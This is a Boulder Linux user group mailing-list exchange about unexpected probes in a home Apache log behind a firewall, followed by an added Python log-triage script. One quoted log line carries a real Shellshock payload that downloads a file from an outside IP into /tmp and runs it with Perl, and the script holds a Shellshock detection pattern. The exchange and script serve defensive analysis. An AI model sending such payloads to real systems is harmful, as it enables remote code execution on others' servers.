[lug] Apache requests (to webdav) behind firewall?!

Lee Woodworth blug-mail at duboulder.com
Tue Nov 15 01:07:30 MST 2016


Is the firewall active and configured with the rules you are expecting?
How about a VPN or ssh port forwarding?

The log entries look like typical external connections.

On 11/14/2016 10:00 PM, Bear Giles wrote:
> I was looking for something else and was shocked to see there are requests
> in my Apache logs on my home system - behind a firewall that isn't supposed
> to be doing port forwarding!
> 
> 164.132.201.51 - - [13/Nov/2016:08:47:56 -0700] "PROPFIND /webdav/
> HTTP/1.1" 405 569 "-" "WEBDAV Client"
> 212.92.127.143 - - [13/Nov/2016:09:10:45 -0700] "GET / HTTP/1.0" 200 3593
> "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
> 23.247.72.43 - - [13/Nov/2016:11:35:42 -0700] "GET / HTTP/1.1" 200 3574 "-"
> "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2;
> .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC
> 6.0)"
> 164.132.201.51 - - [13/Nov/2016:12:39:32 -0700] "PROPFIND /webdav/
> HTTP/1.1" 405 569 "-" "WEBDAV Client"
> 212.92.127.29 - - [13/Nov/2016:14:21:52 -0700] "GET
> /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 479 "-" "() { :; }; /bin/bash -c
> \"wget -O /tmp/.nova.txt 93.158.203.136/style.css; curl -o /tmp/.nova.txt
> 93.158.203.136/style.css; perl /tmp/.nova.txt; rm -rf /tmp/.nova.txt\""
> 141.212.122.128 - - [13/Nov/2016:14:26:01 -0700] "GET /x HTTP/1.1" 400 0
> "-" "Telesphoreo"
> 192.99.144.140 - - [13/Nov/2016:14:54:49 -0700] "PROPFIND /webdav/
> HTTP/1.1" 405 569 "-" "WEBDAV Client"
> 
> There are obviously probes - but how did they get into the system? Via
> malicious javascript that's getting past my filters? Something else? The
> 'wget' entry is particularly disturbing since it clearly recognizes that
> I'm running Linux.
> 
> 
> 
> _______________________________________________
> Web Page:  http://lug.boulder.co.us
> Mailing List: http://lists.lug.boulder.co.us/mailman/listinfo/lug
> Join us on IRC: irc.hackingsociety.org port=6667 channel=#hackingsociety
> 
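A defender's triage pass over log lines like the ones quoted above, added here as an example (it is not code from the thread or from the list): it parses Apache's default "combined" access-log format and tags each request as a WebDAV PROPFIND probe, a mass-scanner hit, a Shellshock-style bash function-definition payload in the User-Agent, or a request Apache rejected with a 400. The sample lines are constructed with RFC 5737 documentation addresses and modelled on the quoted entries; the scanner user-agent list and the tag names are assumptions.

```python
"""Triage Apache 'combined' access-log lines for common Internet background probes.

Added illustration for this thread; not from the original post or the list.
Assumes the stock Apache "combined" LogFormat. Sample lines are constructed
(RFC 5737 documentation addresses), modelled on the entries quoted above.
"""
import re
from collections import Counter

# One "combined" line: host ident user [time] "request" status bytes "referer" "user-agent".
# Quoted fields allow backslash-escaped characters, because Apache logs an embedded
# double quote as \" rather than breaking the field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# Shellshock (CVE-2014-6271) trigger: a bash function definition "() { :; };"
# followed by trailing commands, delivered in a header that a CGI handler exports.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{\s*:\s*;\s*\}\s*;')

# User-agent substrings of well-known mass Internet scanners (assumed list).
SCANNER_UA = ("masscan", "zgrab", "nmap", "nikto")


def unescape(field):
    """Undo Apache's backslash escaping of quotes and backslashes in a logged field.

    (Apache also escapes control bytes as \\xHH; those are left as-is here.)
    """
    return re.sub(r'\\(.)', r'\1', field)


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    rec = m.groupdict()
    parts = unescape(rec.pop("request")).split(" ", 2)
    rec["method"] = parts[0]
    rec["path"] = parts[1] if len(parts) > 1 else ""
    rec["proto"] = parts[2] if len(parts) > 2 else ""
    rec["referer"] = unescape(rec["referer"])
    rec["ua"] = unescape(rec["ua"])
    rec["status"] = int(rec["status"])
    return rec


def classify(rec):
    """Tag a parsed record with the kind of probe it most likely represents."""
    # The combined format only records the Referer and User-Agent headers, so a
    # Shellshock payload carried in any other header would not be visible here.
    for field in (rec["ua"], rec["referer"], rec["path"]):
        if SHELLSHOCK_RE.search(field):
            return "shellshock-probe"
    if rec["method"] == "PROPFIND" and rec["path"].startswith("/webdav"):
        return "webdav-probe"
    ua = rec["ua"].lower()
    if any(s in ua for s in SCANNER_UA):
        return "mass-scanner"
    if rec["status"] == 400:
        return "rejected-400"
    return "unclassified"


def triage(lines):
    """Return (tagged records, counts per tag, counts per source IP) for log lines."""
    tagged = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # skip lines in another format rather than failing the run
        tagged.append((rec["ip"], rec["method"], rec["path"], classify(rec)))
    by_tag = Counter(t[3] for t in tagged)
    by_ip = Counter(t[0] for t in tagged)
    return tagged, by_tag, by_ip


# Constructed sample input, modelled on the quoted entries (documentation addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Nov/2016:08:47:56 -0700] "PROPFIND /webdav/ HTTP/1.1" 405 569 "-" "WEBDAV Client"',
    '192.0.2.20 - - [13/Nov/2016:09:10:45 -0700] "GET / HTTP/1.0" 200 3593 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"',
    '192.0.2.30 - - [13/Nov/2016:11:35:42 -0700] "GET / HTTP/1.1" 200 3574 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)"',
    '192.0.2.40 - - [13/Nov/2016:14:21:52 -0700] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 479 "-" "() { :; }; /bin/bash -c \\"echo shellshock-test\\""',
    '192.0.2.10 - - [13/Nov/2016:12:39:32 -0700] "PROPFIND /webdav/ HTTP/1.1" 405 569 "-" "WEBDAV Client"',
    '192.0.2.50 - - [13/Nov/2016:14:26:01 -0700] "GET /x HTTP/1.1" 400 0 "-" "Telesphoreo"',
]

if __name__ == "__main__":
    tagged, by_tag, by_ip = triage(SAMPLE_LOG)
    for ip, method, path, tag in tagged:
        print(f"{ip:15} {method:9} {path:32} {tag}")
    print("by tag:   ", dict(by_tag))
    print("by source:", dict(by_ip))
```

Two points the output makes clearer than the raw lines: the `() { :; };` prefix is the Shellshock function-definition trigger, and such probes are sprayed at common CGI paths regardless of what the target runs, so the tag fires on the pattern alone; and because the combined format keeps only two request headers, a payload in, say, a Cookie or custom header would not show up in this log at all, which is a reason to log more headers (or use a request-inspecting module) on a host that turns out to be Internet-reachable.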


